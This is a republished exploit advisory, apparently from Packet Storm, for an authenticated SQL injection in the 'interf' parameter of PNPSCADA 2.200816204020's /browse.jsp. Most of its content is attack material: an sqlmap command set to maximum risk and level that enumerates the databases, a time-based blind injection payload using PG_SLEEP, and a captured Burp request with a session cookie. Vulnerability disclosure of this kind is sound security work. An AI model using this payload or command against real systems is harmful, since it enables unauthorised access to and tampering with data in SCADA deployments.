PNPSCADA 2.200816204020 SQL Injection ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on August 22nd, 2020 📆 | 7254 Views ⚑


PNPSCADA 2.200816204020 SQL Injection ≈ Packet Storm

# Exploit Title: PNPSCADA 2.200816204020 – ‘interf’ SQL Injection (Authenticated)
# Google Dork: –
# Date: 2020-08-17
# Exploit Author: İsmail ERKEK
# Vendor Homepage:
# Version: 2.200816204020
# Tested on: –

1. Description:

PNPSCADA 2.200816204020 allows SQL Injection via parameter ‘interf’ in
/browse.jsp. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.

2. Proof of Concept:

In Burpsuite intercept the request from one of the affected pages with
‘interf’ parameter and save it like fuel.req Then run SQLmap to extract the
data from the database:

sqlmap -r req-pnp-browse.txt –risk=3 –level=5 –dbs –random-agent

3. Example payload:

(time-based blind)

memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831

4. Burpsuite request:

POST /browse.jsp HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37


Best Regards.
Ek alanı

Source link

Tagged with:

Leave a Reply

Your email address will not be published. Required fields are marked *